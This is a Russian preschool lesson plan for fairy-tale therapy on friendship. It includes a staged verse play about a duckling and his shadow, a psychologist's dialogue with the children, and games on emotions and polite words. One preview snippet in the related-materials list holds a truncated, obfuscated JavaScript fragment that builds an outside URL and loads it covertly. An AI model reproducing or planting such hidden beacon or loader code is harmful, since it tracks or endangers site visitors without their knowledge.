Сказкотерапия. Занятие "Учимся дружить"
план-конспект занятия (подготовительная группа)
Это занятие по сказкотерпии поможет детям сформировать понятие о дружбе, учить работать в парах, проявлять свои эмоции
Скачать:
Вложение | Размер |
---|---|
skazkoterapiya_uchimsya_druzhit.doc | 61 КБ |
Предварительный просмотр:
План занятия по сказкотерапии на тему: «Учимся дружить»,
(по сказке В. Пляцковского «Как утенок потерял свою тень»)
Задачи
Воспитательные:
– формировать понятие о дружбе, определить «правила поведения друзей», через беседы и драматизацию
- учить сотрудничеству, умению работать в паре
- воспитывать сочувствие, эмпатию, сопереживание
- активизировать словарь: «вежливые» слова, понятия - дружба, дружить, дружный
Развивающие:
- развивать логическое мышление: анализ, классификация
- развивать выразительность речи и движений через инсценировки и мимические этюды
- развитие фантазии, творчество
Предварительная работа:
- Изучение эмоций человека
- Изучение «Вежливых слов» и способов их применения
- Чтение сказок Сутеева, Пляцковского и их обыгрывание
- Чтение сказок, рассказов и стихов на тему «Как надо себя вести с друзьями»
- Разучивание и инсценировка с детьми сказки В. Пляцковского «Как утенок потерял свою тень»
Оборудование:
- Декорации и атрибуты к спектаклю
- Маски и костюмы: цыпленок, утенок, козленок, заяц, лиса, еж, ворона, муравей, бабочка, воробей, медведь.
- Картинки со сказочными персонажами в разных эмоциональных состояниях,
- Музыкальное сопровождение к спектаклю и играм.
- Подготовительный этап
Психолог – Ребята, сегодня наше занятие снова пройдет в театральной комнате. Но перед тем, как мы его начнем, я хочу вас спросить: какое у вас настроение?
Дети отвечают
Психолог – чтобы настроение у всех было хорошее у всех, давайте встанем в круг, возьмемся за руки «пустим улыбку по кругу». Кто начнет?
Дети выполняют.
- Основной этап
Психолог - Сегодня мы с вами просто так в театр не попадем. Посмотрите: кто-то нас не пускает. Скажите - кто это на двери?
Дети – сказочные герои
Психолог – Правильно, каждый из них выражает какую то эмоцию. Назовите героев и их эмоции, кто из них веселый, грустный, удивленный, напуганный, злой, спокойный.
Дети называют героев и определяют их эмоции.
Психолог – Молодцы! Теперь мы можем зайти в зал и посмотреть сказку «Как утенок потерял свою тень».
Инсценировка
Утенок- | Здравствуй, солнце, здравствуй, мячик Ну а я – утенок Крячик Я сейчас иду гулять, Только с кем мне поиграть? Если был бы рядом друг… Надо посмотреть вокруг. (смотрит вокруг, находит свою тень) Ой, да это моя тень! Здравствуй, здравствуй, добрый день! (играет с тенью в мяч, появляется козленок) |
Козленок- | Я тебе не помешаю? Можно тоже поиграю? Я – козленок Мармелад. И люблю я шоколад, А еще люблю варенье, и конфеты и печенье |
Утенок - | Все, что хочешь – то люби А от нас ты отойди |
Козленок- | Ты один, и я один, И не вижу я причин, Чтоб нам вместе не гулять |
Утенок- | Видишь, я гуляю с тенью, Мы играем с ней в футбол. Уходи, батончик-пончик Или в глаз получишь гол! (козленок уходит, появляется цыпленок) |
Цыпленок- | В небе солнце катится, словно колобок И похоже солнышко, вон на тот цветок. (срывает цветок и дарит его утенку) Ой, утеночек, Привет! |
Утенок - | Это что здесь за букет? |
Цыпленок- | Я цыпленок – Фью-фью-фью, Очень я цветы люблю. Я вчера только родился, Еще ни с кем не подружился |
Утенок - | Друг не нужен, уже есть. Видишь, не один я здесь Вместе с тенью я гуляю, А с цветами не играю. Попрошу не трогать мячик, Мелкий желтый одуванчик. (толкает цыпленка, тот плачет) |
Солнце- | Успокойся, и не плач, Вот тебе, цыпленок, мяч Видеть слезки не хочу, Я утенка проучу. (кидает мяч цыпленку, заходит козленок) |
Козленок- Цыпленок- | Я козленок – Мармелад. Я – цыпленок, очень рад (солнце прячется за тучку, тень исчезает) |
Утенок - | Что такое? Что случилось? Тень пропала, солнце скрылось. Тень, ты где? |
Козленок- | Слышишь, Фью. Вон там за горкой кто-то нас на помощь звал Побежали, побежали, может, кто в беду попал. |
Утенок - | Некрасиво получилось – я недавно вас прогнал, Вы спасли меня из ямы, когда я на помощь звал Был я с вами очень грубым, И прошу меня простить Может, вы еще согласны – Будете с мной дружить? |
Цыпленок- | Мы дружить с тобой согласны, Только где же твоя тень? |
Утенок - | Потерялась… |
Цыпленок- | Потерялась? Нам найти ее не лень. (солнышко выходит из-за тучи, тень появляется) |
Утенок - | Ой нашлась! Но только с тенью Не имею больше дел. Я нашел друзей получше, Настоящих, как хотел! |
Беседа по содержанию
Психолог – Ребята, вам понравилась сказка? Все ли герои сказки умели дружить? Почему утенок не захотел играть с другими зверятами? Как вы можете охарактеризовать героев? Изменился утенок, после того как друзья спасли его?
Дети отвечают.
Активизация невербального общения
Психолог – Ребята, как вы думаете, почему утенку понравилась играть с его тенью? Как они общались?
Дети – без слов, жестами, движениями
Психолог - А какие движения делал утенок, когда разговаривал с козленком и цыпленком?
Дети – он дразнился, дрался, толкался.
Психолог – Можно ли понять человек без слов?
Дети – Да, по мимике, движениям, настроению.
Психолог - Молодцы. Я попрошу вас разбиться на пары. Кто-то из вас будет утенком, а второй - его тень. Договоритесь, пожалуйста.
Дети находят себе пару.
Психолог – Теперь вы можете поиграйте со своей тенью. Тень повторяет все движения за своим «хозяином».
Дети изображают позы, движения, и повторяют друг за другом, потом меняются местами.
Психолог – А сейчас мне нужны помощники, вы будете изображать разные эмоции. Остальные ребята, скажут, с кем из них они хотели бы дружить.
Дети выходят и изображают настроения:
- веселый, грустный, злой,
- жадный, обиженный, добрый
- дерется, боится, стоит спокойно, кривляется
Психолог – Давайте определим: если вы хотите, чтобы с вами дружили, как надо себя вести?
Дети – не драться, не кривляться, улыбаться.
Активизация вербального общения
Психолог – Ребята, вспомните, как разговаривал утенок со зверятами сначала?
Дети – грубо, обзывался.
Психолог – послушайте два стихотворения
Обезьянка задавака, всех вокруг дразнила Зайца, белочку, собаку, льва и крокодила обзывалась как попало, брызгалась из лужи, и теперь она одна, с ней никто не дружит обезьянка, будь умнее лучше постарайся, будь приветливей, добрее и не обзывайся. Будут все с тобой дружить, Веселее станет жить | Ягненок, хоть был По возрасту мал Охотно он сплетни Про всех собирал. Всегда очень плохо Про всех говорил, За это ягненка Никто не любил. И с ним не играют, Не верят ему Рассказывай сказки Себе самому. Когда вы не знаете, Что рассказать, То лучше, наверно, Просто молчать. |
Психолог - Скажите, почему со зверятами никто не хотел дружить?
Дети – они были грубыми, не умели пользоваться словами.
Психолог – Очень важно, когда вы играете друг с другом, что вы говорите. Словом можно обидеть, а можно поднять настроение. А есть слова, которые называются «волшебными». Какие?
Психолог - «вежливые» слова.
Психолог – давайте вспомним их. Я буду говорить слова, а вы должны найти лишнее.
«Привет, здравствуй, извини, добрый день»
«Спасибо, пожалуйста, благодарю»
«До свиданья, пока, спокойной ночи»
Психолог – Давайте определим: если вы хотите, чтобы с вами дружили, как надо разговаривать с другими людьми?
Дети – разговаривать спокойно, вежливо, не кричать.
Рефлексия
Психолог - Ребята, скажите, в какой сказке герои были самыми дружными? Что надо помнить и делать, чтобы с тобой хотели играть и дружить?
Психолог - Все-все молодцы! Что вам сегодня больше всего понравилось?
Ритуал окончания. Все дети встают в круг, берутся за руки и говорят: «Всем-всем спасибо, все-все молодцы!»
По теме: методические разработки, презентации и конспекты
Проект по сказкотерапии "По дорогам сказок" (роль сказкотерапии в социально - личностном развитии детей)
Проект по сказкотерапии «По дорогам сказок».(роль сказкотерапии в социально – личностном развитии детей)...
Руководство по сказкотерапии. "Сказкотерапия, как воспитательная система органичная внутренней среде человека"
Руководство по сказкотерапии адресовано педагогам, родителям и всем тем, кто чувствует близость к сказочному жанру. Здесь в популярной форме рассказывается о том, какие виды сказок существуют, ка...
Сказкотерапия-как форма работы с детьми .Практикум по сказкотерапии
laquo;Сказкотерапия» - понятие, которое появилось сравнительно недавно, и у разных специалистов оно порождает множество ассоциаций. Для одних «сказкотерапия» - это лечение сказками....
Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».
Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...
Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...
Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»
Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...
Программа семейного клуба «Учимся дружить» Название: Программа семейного клуба «Учимся дружить» Работа с родителями вновь прибывших детей. 2019-2020год
Программа семейного клуба «Учимся дружить». 1. Паспорт программы.Наименование программы «Учимся дружить» программа семейного клуба в условиях ДОУЦель программы:...